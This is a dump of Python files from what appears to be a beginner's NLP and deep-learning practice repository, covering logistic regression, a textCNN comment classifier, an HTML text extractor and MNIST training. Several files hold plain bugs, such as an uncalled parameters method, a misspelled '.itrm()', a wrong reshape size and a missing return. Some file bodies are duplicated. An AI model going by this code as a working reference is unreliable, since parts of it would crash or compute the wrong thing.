print(x.shape) # 400 2\ny = np.zeros((m, 1), dtype='uint8') # label 向量,0 表示红色,1 表示蓝色\n# print(y.shape) # 400 1\na = 4\n\nfor j in range(2):\n ix = range(N*j,N*(j+1)) # 0-200;200-400\n t = np.linspace(j*3.12,(j+1)*3.12,N) + np.random.randn(N)*0.2 # theta\n r = a*np.sin(4*t) + np.random.randn(N)*0.2 # radius\n x[ix] = np.c_[r*np.sin(t), r*np.cos(t)]\n y[ix] = j\nplt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\n\n# use logistic\nx = torch.from_numpy(x).float()\ny = torch.from_numpy(y).float()\nw = nn.Parameter(torch.randn(2, 1))\nb = nn.Parameter(torch.zeros(1))\n\noptimizer = torch.optim.SGD([w, b], 1e-1)\n\ndef logistic_regression(x):\n return torch.mm(x, w) + b\n\ncriterion = nn.BCEWithLogitsLoss()\n\nfor e in range(100):\n out = logistic_regression(Variable(x))\n loss = criterion(out, Variable(y))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1) % 20 == 0:\n print('epoch: {}, loss: {}'.format(e+1, loss))\n\ndef plot_logistic(x):\n x = Variable(torch.from_numpy(x).float())\n out = F.sigmoid(logistic_regression(x))\n out = (out > 0.5) * 1\n return out.data.numpy()\nplot_decision_boundary(lambda x: plot_logistic(x), x.numpy(), y.numpy())\nplt.title('logistic regression')\nplt.show()\n\n# use natualnet\n# 定义两层神经网络的参数\nw1 = nn.Parameter(torch.randn(2, 4) * 0.01) # 隐藏层神经元个数 2\nb1 = nn.Parameter(torch.zeros(4))\n\nw2 = nn.Parameter(torch.randn(4, 1) * 0.01)\nb2 = nn.Parameter(torch.zeros(1))\n\n# 定义模型\ndef two_network(x):\n x1 = torch.mm(x, w1) + b1\n x1 = F.tanh(x1) # 使用 PyTorch 自带的 tanh 激活函数\n x2 = torch.mm(x1, w2) + b2\n return x2\n\noptimizer = torch.optim.SGD([w1, w2, b1, b2], 1.)\n\ncriterion = nn.BCEWithLogitsLoss()\n\n# 我们训练 10000 次\nfor e in range(10000):\n out = two_network(Variable(x))\n loss = criterion(out, Variable(y))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1) % 1000 == 0:\n print('epoch: {}, loss: {}'.format(e+1, loss))\n\ndef plot_network(x):\n x = Variable(torch.from_numpy(x).float())\n x1 = torch.mm(x, w1) + b1\n x1 = F.tanh(x1)\n x2 = torch.mm(x1, w2) + b2\n out = F.sigmoid(x2)\n out = (out > 0.5) * 1 # 0 red 1 blue but the value of out is consisting of float value between 0 to 1\n return out.data.numpy()\nplot_decision_boundary(lambda x: plot_network(x), x.numpy(), y.numpy())\nplt.title('2 layer network')\nplt.show()" }, { "alpha_fraction": 0.5215632319450378, "alphanum_fraction": 0.5384671092033386, "avg_line_length": 31.59951400756836, "blob_id": "e09bf92eb6c5169670529040deff00df48f4ff04", "content_id": "8a2640362c21e30e35feab7e8d1497ded1078aa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14455, "license_type": "no_license", "max_line_length": 95, "num_lines": 412, "path": "/textcnn_comments/dataprepare/dataload.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport os\r\nimport time\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\nimport jieba\r\nimport textcnn_comments.model.textCNN_data as textCNN_data\r\nfrom textcnn_comments.model.textCNNpy import textCNN\r\ndata_source_path ='../data/common.txt'\r\ndata_train_path = '../data/data_train.txt'\r\ndata_test_path = '../data/data_test.txt'\r\nwordlabels_path = '../data/wordlabes.txt'\r\nlengthfile_path = '../data/length.txt'\r\nstopword_path = '../data/stopword.txt'\r\ntraindataVec_path = '../data/traindataVec.txt'\r\ntestdataVec_path 
= '../data/testdataVec.txt'\r\nlabelsrc_path = '../data/labels.xlsx'\r\nuserdata = '../data/user_input_data.txt'\r\nuserres = '../data/user_input_res.txt'\r\nmaxLen = 16\r\n# load origin data\r\ndef partiondata():\r\n csv_data = pd.read_csv(data_source_path, encoding='utf8', header=None, sep='\\t') # 读取训练数据\r\n data_labels = csv_data[0]\r\n data_contents = csv_data[1]\r\n test_count = 1000\r\n index = 0\r\n data_test = open(data_test_path, 'w', encoding='utf_8')\r\n data_train = open(data_train_path, 'w', encoding='utf_8')\r\n for line in data_contents:\r\n # 如果去掉这句 跑不起来\r\n # 也就是说 需要数据的label号 < 5\r\n if data_labels[index] >145:# test 60 127 128\r\n # 146 出错\r\n # 145 能跑\r\n index += 1\r\n continue\r\n\r\n if (str(line) == 'nan'):\r\n index+=1\r\n continue\r\n data = str(data_labels[index]) + '\\t' + str(line)\r\n if test_count > 0:\r\n data_test.write(data)\r\n data_test.write('\\n')\r\n test_count -= 1\r\n index+=1\r\n continue\r\n data_train.write(data)\r\n data_train.write('\\n')\r\n index += 1\r\n# trans the train data to wordlabels\r\n# read train data and translate it to word label\r\ndef getwordlalbes():\r\n f_w = open(wordlabels_path, 'w', encoding='utf_8')\r\n # 记录字符\r\n # 记录序号\r\n # 计算频次\r\n worddict = {}\r\n len_dic = {}\r\n datas = open(data_source_path,'r',encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None,datas))\r\n stoplist = open(stopword_path, 'r', encoding='utf_8').read().split('\\n')\r\n for line in datas:\r\n line_data = line.split('\\t') # line_data[0] label , #line_data[1] text\r\n text = line_data[1]\r\n text_seg = jieba.cut(text,cut_all=False)\r\n length = 0\r\n for w in text_seg:\r\n if w in stoplist:\r\n continue\r\n length += 1\r\n if w in worddict:\r\n worddict[w] += 1\r\n else:\r\n worddict[w] = 1\r\n if length in len_dic:\r\n len_dic[length] += 1\r\n else:\r\n len_dic[length] = 1\r\n wordlist = sorted(worddict.items(),key = lambda item:item[1],reverse=True)\r\n f = open(wordlabels_path,'w',encoding='utf_8')\r\n index = 0\r\n for t in wordlist:\r\n d = t[0] + ' ' + str(index) + ' ' + str(t[1]) +'\\n'\r\n index += 1\r\n f.write(d)\r\n for k, v in len_dic.items():\r\n len_dic[k] = round(v * 1.0 / len(datas), 3)\r\n len_list = sorted(len_dic.items(), key=lambda item:item[0], reverse=True)\r\n f = open(lengthfile_path, 'w')\r\n for t in len_list:\r\n d = str(t[0]) + ' ' + str(t[1]) + '\\n'\r\n f.write(d)\r\n# text2vec 需要的函数\r\ndef get_worddict(file):\r\n datas = open(file, 'r', encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None, datas))\r\n word2ind = {}\r\n for line in datas:\r\n line = line.split(' ')\r\n word2ind[line[0]] = int(line[1])\r\n ind2word = {word2ind[w]: w for w in word2ind}\r\n return word2ind, ind2word\r\n# 获取标签信息\r\ndef get_labeldic(file):\r\n lablefile = pd.read_excel(file,sheet_name='通用')\r\n df = lablefile\r\n # 获取最大行,最大列\r\n nrows = lablefile.shape[0]\r\n ncols = lablefile.columns.size\r\n print(\"=========================================================================\")\r\n print('Max Rows:' + str(nrows))\r\n print('Max Columns' + str(ncols))\r\n # 显示列名,以列表形式显示\r\n print(df.columns)\r\n\r\n # 显示列名,并显示列名的序号\r\n for iCol in range(ncols):\r\n # print(str(iCol) + ':' + df.columns[iCol])\r\n pass\r\n # 列出特定行列,单元格的值\r\n #print(df.iloc[0, 0])\r\n #print(df.iloc[0, 1])\r\n\r\n #print(df['类目'])\r\n print('=====================================End0==================================')\r\n\r\n # 查看第3列的内容,列的序号从0开始\r\n sColumnName = df.columns[2]\r\n print(df[sColumnName])\r\n 
print('=====================================End1==================================')\r\n # 查看某行的内容\r\n print('查看某行的内容\\n')\r\n iRow = 1\r\n for iCol in range(ncols):\r\n print(df.iloc[iRow, iCol])\r\n print('遍历逐行逐列\\n')\r\n # 遍历逐行逐列\r\n for iRow in range(nrows):\r\n for iCol in range(ncols):\r\n # print(df.iloc[iRow, iCol])\r\n pass\r\n\r\n print('=====================================End2==================================')\r\n\r\n pass\r\n# 将训练数据和测试数据转换为向量\r\ndef text2vec(file,vecfile):\r\n traindataTxt = open(vecfile, 'w')\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n datas = open(file,'r',encoding='utf_8').read().split('\\n')\r\n stoplist = open(stopword_path, 'r', encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None,datas))\r\n for line in datas:\r\n line = line.split('\\t')\r\n text = line[1]\r\n # 获取标签数据 找到当前句子的对应标签\r\n label_index = line[0]\r\n text_seg = jieba.cut(text,cut_all=False)\r\n text_indexs = [label_index]\r\n for w in text_seg:\r\n if w in stoplist:\r\n continue\r\n text_indexs.append(word2ind[w])\r\n length = len(text_indexs)\r\n if length >maxLen + 1:\r\n text_indexs = text_indexs[0:maxLen+1]\r\n if length < maxLen + 1:\r\n text_indexs.extend(['0']*(maxLen-length+1))\r\n for n in text_indexs:\r\n traindataTxt.write(str(n) + ',')\r\n traindataTxt.write('\\n')\r\n pass\r\ndef vec2text(sentence):\r\n sentence=sentence\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n text = ''\r\n #print(sentence)\r\n for index in sentence.numpy():\r\n if index ==0:\r\n continue\r\n text += ind2word[index]\r\n return text\r\n# 这个函数暂时没弄好\r\ndef read_labelFile(file):\r\n data = pd.read_excel(labelsrc_path,sheet_name='通用')\r\n label_w2n = {}\r\n label_n2w = {}\r\n # 获取最大行,最大列\r\n nrows = data.shape[0]\r\n ncols = data.columns.size\r\n # 遍历逐行逐列\r\n first_label = data['一级label']\r\n second_label = data['二级label']\r\n number_label = data['label号']\r\n # print(number_label)\r\n label_data = [number_label,first_label,second_label]\r\n return label_data\r\ndef train(textCNN_param,dataLoader_param):\r\n # init net\r\n print('init net...')\r\n net = textCNN(textCNN_param)\r\n weightFile = 'weight.pkl'\r\n print(os.path)\r\n if os.path.exists(weightFile):\r\n print('load weight')\r\n net.load_state_dict(torch.load(weightFile))\r\n else:\r\n net.init_weight()\r\n print(net)\r\n #net.cuda()\r\n\r\n # init dataset\r\n print('init dataset...')\r\n dataLoader = textCNN_data.textCNN_dataLoader(dataLoader_param)\r\n print(dataLoader.__len__())\r\n valdata = textCNN_data.get_valdata()\r\n\r\n optimizer = torch.optim.Adam(net.parameters(), lr=0.01)\r\n criterion = nn.NLLLoss()\r\n\r\n log = open('log_{}.txt'.format(time.strftime('%y%m%d%H')), 'w')\r\n log.write('epoch step loss\\n')\r\n log_test = open('log_test_{}.txt'.format(time.strftime('%y%m%d%H')), 'w')\r\n log_test.write('epoch step test_acc\\n')\r\n print(\"training...\")\r\n #f = open('123.txt','w',encoding='utf_8')\r\n for epoch in range(50):\r\n for i, (clas, sentences) in enumerate(dataLoader):\r\n optimizer.zero_grad()\r\n sentences = sentences.type(torch.LongTensor)\r\n clas = clas.type(torch.LongTensor)\r\n out = net(sentences)# batch_size * num_classes 128*146\r\n # _nn.nll_loss(input, target, weight, _Reduction.get_enum(reduction), ignore_index)\r\n # cur_target >= 0 && cur_target < n_classes\r\n # 128*146 128 *\r\n # print(clas,'1111111')\r\n loss = criterion(out, clas)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n #if (i + 1) % 1 == 0:\r\n #print(\"epoch:\", epoch + 1, \"step:\", i + 1, \"loss:\", 
loss.item())\r\n #data = str(epoch + 1) + ' ' + str(i + 1) + ' ' + str(loss.item()) + '\\n'\r\n #log.write(data)\r\n print(\"save model...\")\r\n torch.save(net.state_dict(), weightFile)\r\n torch.save(net.state_dict(),\r\n \"model\\{}_model_iter_{}_{}_loss_{:.2f}.pkl\".\r\n format(time.strftime('%y%m%d%H'), epoch, i,loss.item())\r\n ) # current is model.pkl\r\n print(\"epoch:\", epoch + 1, \"step:\", i + 1, \"loss:\", loss.item())\r\n pass\r\ndef get_valData(file):\r\n datas = open(file, 'r').read().split('\\n')\r\n datas = list(filter(None, datas))\r\n return datas\r\ndef parse_net_result(out):\r\n score = max(out) # 最大的值\r\n label = np.where(out == score)[0][0] # 找到out中与最大值所在位置相同的\r\n return label, score\r\ndef ceshi():\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n # 获取标签信息\r\n labeldata = read_labelFile(labelsrc_path)\r\n textCNN_param = {\r\n 'vocab_size': len(word2ind),\r\n 'embed_dim': 60,\r\n 'class_num': len(labeldata[0]),\r\n \"kernel_num\": 16,\r\n \"kernel_size\": [3, 4, 5],\r\n \"dropout\": 0.5,\r\n }\r\n # init net\r\n print('init net...')\r\n net = textCNN(textCNN_param)\r\n weightFile = 'weight.pkl'\r\n if os.path.exists(weightFile):\r\n print('load weight')\r\n net.load_state_dict(torch.load(weightFile))\r\n else:\r\n print('No weight file!')\r\n exit()\r\n print(net)\r\n # net.cuda()\r\n net.eval()\r\n numAll = 0\r\n numRight = 0\r\n testData = get_valData(testdataVec_path)\r\n for data in testData:\r\n numAll += 1\r\n data = data.split(',')\r\n label = int(data[0])\r\n sentence = np.array([int(x) for x in data[1:maxLen+1]])\r\n sentence = torch.from_numpy(sentence)\r\n predict = net(sentence.unsqueeze(0).type(torch.LongTensor)).cpu().detach().numpy()[0]\r\n label_pre, score = parse_net_result(predict)\r\n if label_pre == label and score > -100:\r\n numRight += 1\r\n if numAll % 100 == 0:\r\n print('acc:{}({}/{})'.format(numRight / numAll, numRight, numAll))\r\n pass\r\ndef get_userdata(filepath):\r\n # 读取数据\r\n datas = open(filepath,'r',encoding='utf_8').read().split('\\n')\r\n print('**********************\\n',datas)\r\n # 转换为向量\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n stoplist = open(stopword_path, 'r', encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None, datas))\r\n sentens = []\r\n for line in datas:\r\n text = line\r\n label_index = -1\r\n text_seg = jieba.cut(text, cut_all=False)\r\n text_indexs = [label_index]\r\n for w in text_seg:\r\n if w in stoplist:\r\n continue\r\n text_indexs.append(word2ind[w])\r\n length = len(text_indexs)\r\n if length > maxLen + 1:\r\n text_indexs = text_indexs[0:maxLen + 1]\r\n if length < maxLen + 1:\r\n text_indexs.extend(['0'] * (maxLen - length + 1))\r\n sentens.append(text_indexs)\r\n sentens = list(filter(None, sentens))\r\n return sentens\r\n pass\r\ndef ceshiforuserdata(userdatafile,resfile):\r\n resfile = open(resfile,'w',encoding='utf_8')\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n # 获取标签信息\r\n labeldata = read_labelFile(labelsrc_path)\r\n textCNN_param = {\r\n 'vocab_size': len(word2ind),\r\n 'embed_dim': 60,\r\n 'class_num': len(labeldata[0]),\r\n \"kernel_num\": 16,\r\n \"kernel_size\": [3, 4, 5],\r\n \"dropout\": 0.5,\r\n }\r\n # init net\r\n print('init net...')\r\n net = textCNN(textCNN_param)\r\n weightFile = 'weight.pkl'\r\n if os.path.exists(weightFile):\r\n print('load weight')\r\n net.load_state_dict(torch.load(weightFile))\r\n else:\r\n print('No weight file!')\r\n exit()\r\n print(net)\r\n # net.cuda()\r\n net.eval()\r\n numAll = 0\r\n numRight = 0\r\n 
testData = get_userdata(userdatafile)\r\n oneres = ''\r\n for data in testData:\r\n sentence = np.array([int(x) for x in data[1:maxLen+1]])\r\n sentence = torch.from_numpy(sentence)\r\n predict = net(sentence.unsqueeze(0).type(torch.LongTensor)).cpu().detach().numpy()[0]\r\n label_pre, score = parse_net_result(predict)\r\n words = vec2text(sentence)\r\n oneres +='数据:'+words\r\n oneres +='\\tlabel号:\\t'+str(label_pre)\r\n oneres +='\\t一级label:\\t'+ str(labeldata[1][label_pre])\r\n oneres +='\\t二级label:\\t'+ str(labeldata[2][label_pre])\r\n oneres +='\\n'\r\n resfile.write(oneres)\r\n pass\r\ndef main():\r\n # 数据获取并且切分为训练集和测试集\r\n partiondata()\r\n # 根据训练集获得词表\r\n getwordlalbes()\r\n # 将训练集数据转换为向量\r\n text2vec(data_train_path,traindataVec_path)\r\n # 将测试集数据转换为向量\r\n text2vec(data_test_path,testdataVec_path)\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n # 获取标签信息\r\n labeldata = read_labelFile(labelsrc_path)\r\n textCNN_param = {\r\n 'vocab_size': len(word2ind),\r\n 'embed_dim': 60,\r\n 'class_num': len(labeldata[0]),\r\n \"kernel_num\": 16,\r\n \"kernel_size\": [3, 4, 5],\r\n \"dropout\": 0.5,\r\n }\r\n dataLoader_param = {\r\n 'batch_size': 128,\r\n 'shuffle': True,\r\n }\r\n print(textCNN_param)\r\n print('*'*100)\r\n train(textCNN_param,dataLoader_param)\r\n\r\nif __name__ == \"__main__\":\r\n print('start main...')\r\n #main()\r\n print('start test...')\r\n ceshi()\r\n print('test userinput...')\r\n ceshiforuserdata(userdata,userres)\r\n print('end...')\r\n" }, { "alpha_fraction": 0.5868024826049805, "alphanum_fraction": 0.6519043445587158, "avg_line_length": 54.04878234863281, "blob_id": "4b31a32c53c6c8f5de927217e4be8ea1511b7d37", "content_id": "6e2a825bff564ea79967b4a896f13239386b432c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2286, "license_type": "no_license", "max_line_length": 843, "num_lines": 41, "path": "/cleardata/html_parser.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "GB18030", "text": "# coding=gbk\nfrom bs4 import BeautifulSoup\nfrom utils.remove_special_symbol import redundant_remove\n\n\ndef extract_from_html(html):\n soup = BeautifulSoup(html, 'html.parser')\n span_list = soup.find_all('span', style=lambda value: value and \"rgb(255, 255, 255)\" not in value)\n content = ''\n for i, text in enumerate(span_list):\n text = redundant_remove(text.get_text().strip('\\n'))\n if 'end' in text.lower():\n break\n if max([len(s) for s in text.split(' ')]) > 50:\n continue\n content = ' '.join([content, text])\n return content\n\n\ndef parser_external_html(html_doc):\n soup = BeautifulSoup(html_doc, 'html.parser')\n span_list = soup.find_all('span', style=lambda value: value and \"rgb(255, 255, 255)\" not in value)\n content = ''\n for i, text in enumerate(span_list):\n text = redundant_remove(text.get_text().strip('\\n'))\n if 'end' in text.lower():\n break\n if max([len(s) for s in text.split(' ')]) > 50:\n continue\n content = ' '.join([content, text])\n return content\n\nif __name__ == '__main__':\n # path = '/Users/iron/Documents/公众号项目/文章/185.txt'\n path = '/Users/iron/Documents/公众号项目/文章/117.txt'\n # with open(path, 'r', encoding='utf8') as f:\n # html_doc = f.readline()\n # title, content = parser(html_doc)\n # print(\"title: \",title)\n # print(\"content: \",content)\n html = '<html><head></head><body><p style=text-align: center;line-height: 2em;margin-left: 8px;margin-right: 8px;\"><img 
data-src=\"http://yw-yx.oss-cn-hangzhou.aliyuncs.com/wechat/article/img/2019/06/1144582901707291786.gif\" data-type=\"gif\" class=\"\" data-ratio=\"0.14583333333333334\" data-w=\"480\" imgid=\"wechat/article/img/2019/06/1144582901707291786.gif\" src=\"http://yw-yx.oss-cn-hangzhou.aliyuncs.com/wechat/article/img/2019/06/1144582901707291786.gif\"></p><section data-role=\"outer\" label=\"Powered by 135editor.com\"><section class=\"article135\"><section data-role=\"paragraph\" class=\"_135editor\" data-color=\"#fffcf6\"><p style=\"line-height: normal;\"><br></p><p style=\"text-align: center;line-height: 2em;margin-left: 8px;margin-right: 8px;\"><strong style=\"white-space: normal;letter-spacing: 0.5px;text-align: left;background-color: rgb(255'\n\n" }, { "alpha_fraction": 0.5747541785240173, "alphanum_fraction": 0.6156933307647705, "avg_line_length": 29.378047943115234, "blob_id": "6430fa645e2ac0e0e509032576ee5eaa134e48fb", "content_id": "52537b09be9c055d48618999da94870cf40b5c12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4983, "license_type": "no_license", "max_line_length": 114, "num_lines": 164, "path": "/linertest/mnist_train.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "\nimport torch\nfrom torch import nn\nfrom torch import utils\nfrom torch.nn import functional as F\nfrom torch import optim\nimport torchvision\nfrom matplotlib import pyplot as plt\nfrom linertest.utils import one_hot,plot_image,plot_curve\nbatch_size = 512\n# step1 load dataset\ntrain_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data',train=True,download=True,transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,),(0.3081,))]\n )),\n batch_size = batch_size,shuffle = True\n)\ntest_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data', train=False, download=True, transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,), (0.3081,))]\n )),\n batch_size=batch_size, shuffle=True\n)\nx,y = next(iter(train_loader))\nprint(x.shape,y.shape)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # xw+b\n # a img is 28*28\n self.fc1 = nn.Linear(28*28,256)\n self.fc2 = nn.Linear(256,64)\n # depend on one_hot ,so we should out 10dim\n self.fc3 = nn.Linear(64,10)\n def forward(self,x):\n # x:[b,1,28,28]\n # h1 = relu(xw+b)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\nnet = Net()\noptimizer = optim.SGD(net.parameters,lr=0.01,momentum=0.9)\ntrain_loss = []\nfor epoch in range(3):\n for batch_idx,(x,y) in enumerate(train_loader):\n # x\n print(x.shape,y.shape)\n # x:[b,1,28,28],y:[512]\n #[b,1,28,28]=>[b,784]\n x = x.view(x.size(0),28*28)\n # =>[b,10]\n out = net(x)\n y_one_hot = one_hot(y)\n loss = F.mse_loss(out,y_one_hot)\n optimizer.zero_grad()\n loss.backward()\n # w' = w - lr*grad\n optimizer.step()\n train_loss.append(loss.item())\n if batch_idx%10==0:\n print(epoch,batch_idx,loss.item())\nplot_curve(train_loss)\n\n# test\ntotal_correct = 0\nfor x,y in test_loader:\n x = x.view(x.size(0),28*28)\n out = net(x)\n pred = out.argmax(dim=1)\n correct = pred.eq(y).sum().float().item()\n total_correct+=correct\ntotol_sum = len(test_loader.dataset)\nacc = total_correct/totol_sum\nprint('test acc:',acc)\n\nx,y = next(iter(test_loader))\nout = net(x.view(x.size(0),2*28))\npred = 
out.argmax(dim=1)\nplot_image(x,pred,'Test')\nimport torch\nfrom torch import nn\nfrom torch import utils\nfrom torch.nn import functional as F\nfrom torch import optim\nimport torchvision\nfrom matplotlib import pyplot as plt\nfrom linertest.utils import one_hot,plot_image,plot_curve\nbatch_size = 512\n# step1 load dataset\ntrain_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data',train=True,download=True,transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,),(0.3081,))]\n )),\n batch_size = batch_size,shuffle = True\n)\ntest_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data', train=False, download=True, transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,), (0.3081,))]\n )),\n batch_size=batch_size, shuffle=True\n)\nx,y = next(iter(train_loader))\nprint(x.shape,y.shape)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # xw+b\n # a img is 28*28\n self.fc1 = nn.Linear(28*28,256)\n self.fc2 = nn.Linear(256,64)\n # depend on one_hot ,so we should out 10dim\n self.fc3 = nn.Linear(64,10)\n def forward(self,x):\n # x:[b,1,28,28]\n # h1 = relu(xw+b)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\nnet = Net()\noptimizer = optim.SGD(net.parameters,lr=0.01,momentum=0.9)\ntrain_loss = []\nfor epoch in range(3):\n for batch_idx,(x,y) in enumerate(train_loader):\n # x\n print(x.shape,y.shape)\n # x:[b,1,28,28],y:[512]\n #[b,1,28,28]=>[b,784]\n x = x.view(x.size(0),28*28)\n # =>[b,10]\n out = net(x)\n y_one_hot = one_hot(y)\n loss = F.mse_loss(out,y_one_hot)\n optimizer.zero_grad()\n loss.backward()\n # w' = w - lr*grad\n optimizer.step()\n train_loss.append(loss.item())\n if batch_idx%10==0:\n print(epoch,batch_idx,loss.item())\nplot_curve(train_loss)\n\n# test\ntotal_correct = 0\nfor x,y in test_loader:\n x = x.view(x.size(0),28*28)\n out = net(x)\n pred = out.argmax(dim=1)\n correct = pred.eq(y).sum().float().item()\n total_correct+=correct\ntotol_sum = len(test_loader.dataset)\nacc = total_correct/totol_sum\nprint('test acc:',acc)\n\nx,y = next(iter(test_loader))\nout = net(x.view(x.size(0),2*28))\npred = out.argmax(dim=1)\nplot_image(x,pred,'Test')\n" }, { "alpha_fraction": 0.5611650347709656, "alphanum_fraction": 0.5961164832115173, "avg_line_length": 30.53061294555664, "blob_id": "7146845961cef47fd9f0365729e52966961144dc", "content_id": "0318ddde63cc2bcdba2d178c3747cec49350aebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1545, "license_type": "no_license", "max_line_length": 78, "num_lines": 49, "path": "/linertest/utils.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "\nimport torch\nfrom matplotlib import pyplot as plt\ndef plot_curve(data):\n fig = plt.figure()\n plt.plot(range(len(data)),data,color='blue')\n plt.legend(['value'],loc='upper right')\n plt.xlabel('step')\n plt.ylabel('value')\n plt.show()\ndef plot_image(img,label,name):\n fig = plt.figure()\n for i in range(6):\n plt.subplot(2,3,i+1)\n plt.tight_layout()\n plt.imshow(img[i][0]*0.3081+0.1307,cmap = 'gray',interpolation='none')\n plt.title(\"{}:{}\".format(name,label[i].itrm()))\n plt.xticks([])\n plt.yticks([])\n plt.show()\ndef one_hot(label,depth=10):\n out = torch.zero_(label.size(0),depth)\n idx = torch.LongTensor(label).view(-1,1)\n 
out.scatter_(dim=1,index=idx,value=1)\nimport torch\nfrom matplotlib import pyplot as plt\ndef plot_curve(data):\n fig = plt.figure()\n plt.plot(range(len(data)),data,color='blue')\n plt.legend(['value'],loc='upper right')\n plt.xlabel('step')\n plt.ylabel('value')\n plt.show()\ndef plot_image(img,label,name):\n fig = plt.figure()\n for i in range(6):\n plt.subplot(2,3,i+1)\n plt.tight_layout()\n plt.imshow(img[i][0]*0.3081+0.1307,cmap = 'gray',interpolation='none')\n plt.title(\"{}:{}\".format(name,label[i].itrm()))\n plt.xticks([])\n plt.yticks([])\n plt.show()\ndef one_hot(label,depth=10):\n out = torch.zero_(label.size(0),depth)\n idx = torch.LongTensor(label).view(-1,1)\n out.scatter_(dim=1,index=idx,value=1)\n return out\nprint( (0 > 0.5) * 1) # 0\nprint( (1 > 0.5) * 1) # 1" }, { "alpha_fraction": 0.46815288066864014, "alphanum_fraction": 0.5268425941467285, "avg_line_length": 28.70270347595215, "blob_id": "bddfaff07215deaca393b5e11b53595f0277114e", "content_id": "c461955ff2e304edc68932cdbcb4afd1bbb1f0fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2256, "license_type": "no_license", "max_line_length": 87, "num_lines": 74, "path": "/stydytest/descend_demo_torch.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\ntorch.manual_seed(2019)\ndef getdata():\n # 读入数据 x 和 y\n # 15组point(x,y)\n x_train = np.array([[3.3], [4.4], [5.5], [6.71], [6.93], [4.168],\n [9.779], [6.182], [7.59], [2.167], [7.042], [10.791],\n [5.313], [7.997], [3.1]], dtype=np.float32)\n\n y_train = np.array([[1.7], [2.76], [2.09], [3.19], [1.694], [1.573],\n [3.366], [2.596], [2.53], [1.221], [2.827],\n [3.465], [1.65], [2.904], [1.3]], dtype=np.float32)\n x_train = torch.from_numpy(x_train)\n y_train = torch.from_numpy(y_train)\n return x_train,y_train\n\n\nclass linear_Model(nn.Module):\n def __init__(self):\n super(linear_Model,self).__init__()\n self.l_1 = nn.Linear(1,1)\n pass\n def forward(self, x):\n # y = wx+b\n # loss = [y_r - (wx+b)]**2\n out = self.l_1(x)\n return out\ndef train():\n # prepare data\n x, y = getdata()\n x = Variable(x)\n y = Variable(y)\n # init model\n model = linear_Model()\n # loss\n criterion = nn.MSELoss()\n # 优化函数\n optimizer = torch.optim.SGD(model.parameters(),lr = 0.01)\n num_epochs = 1000\n for epoch in range(num_epochs):\n inputs = x#(x)\n target = y#Variable(y)\n # 向前传播\n out = model(inputs)\n loss = criterion(out, target)\n # 向后传播\n optimizer.zero_grad() # 注意每次迭代都需要清零\n loss.backward()\n optimizer.step()\n if (epoch + 1) % 20 == 0:\n print('Epoch[{}/{}], loss:{:.6f}'.format(epoch + 1, num_epochs, loss.data))\n predict(model,x,y)\n pass\n\ndef predict(model,x,y):\n model.eval()\n if torch.cuda.is_available():\n predict = model(Variable(x).cuda())\n predict = predict.data.cpu().numpy()\n else:\n predict = model(Variable(x))\n predict = predict.data.numpy()\n plt.plot(x.numpy(), y,'ro',label='Original Data')\n plt.plot(x.numpy(), predict, label='Fitting Line')\n plt.show()\n pass\nprint('dasdasdas')\nif __name__ == \"__main__\":\n train()\n" }, { "alpha_fraction": 0.5210933089256287, "alphanum_fraction": 0.5387205481529236, "avg_line_length": 32.65999984741211, "blob_id": "cc19f0aaf9847d4d7ac6f9ceee01014ae20fa3a0", "content_id": "9b951c3781f9eafa2562a04febd35085e3a65b51", "detected_licenses": [], "is_generated": false, 
